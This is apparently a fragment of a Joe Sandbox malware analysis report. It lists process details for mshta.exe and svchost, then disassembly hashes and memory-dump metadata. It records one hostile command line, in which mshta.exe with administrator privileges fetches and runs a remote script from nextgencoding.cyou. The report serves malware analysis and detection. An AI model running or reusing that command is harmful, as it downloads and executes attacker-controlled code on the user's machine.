                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3
                                        Imagebase:0x7ff6f58c0000
                                        File size:14'848 bytes
                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:6
                                        Start time:03:03:46
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                        Imagebase:0x7ff6eef20000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FFD9B7D33B5 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1686649639.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41

                                          Executed Functions

                                          Function 00000288379D0FA1 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2912923984.00000288379D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000288379D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_288379d0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction ID: 696fd1b49e0748163d0d9c60f92335e08578f75731fccc4ad935dab5d26c3f8b
                                          • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction Fuzzy Hash: 6290020849640A55D41421990C8A29C5040A388550FE585E0481690145DC8D46961262
                                          Function 00000288379D0FC1 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2912923984.00000288379D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000288379D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_288379d0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction ID: 696fd1b49e0748163d0d9c60f92335e08578f75731fccc4ad935dab5d26c3f8b
                                          • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction Fuzzy Hash: 6290020849640A55D41421990C8A29C5040A388550FE585E0481690145DC8D46961262
                                          Function 00000288379D0FB9 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2912923984.00000288379D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000288379D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_288379d0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction ID: 696fd1b49e0748163d0d9c60f92335e08578f75731fccc4ad935dab5d26c3f8b
                                          • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction Fuzzy Hash: 6290020849640A55D41421990C8A29C5040A388550FE585E0481690145DC8D46961262
                                          Function 00000288379D0FB1 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2912923984.00000288379D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000288379D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_288379d0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction ID: 696fd1b49e0748163d0d9c60f92335e08578f75731fccc4ad935dab5d26c3f8b
                                          • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction Fuzzy Hash: 6290020849640A55D41421990C8A29C5040A388550FE585E0481690145DC8D46961262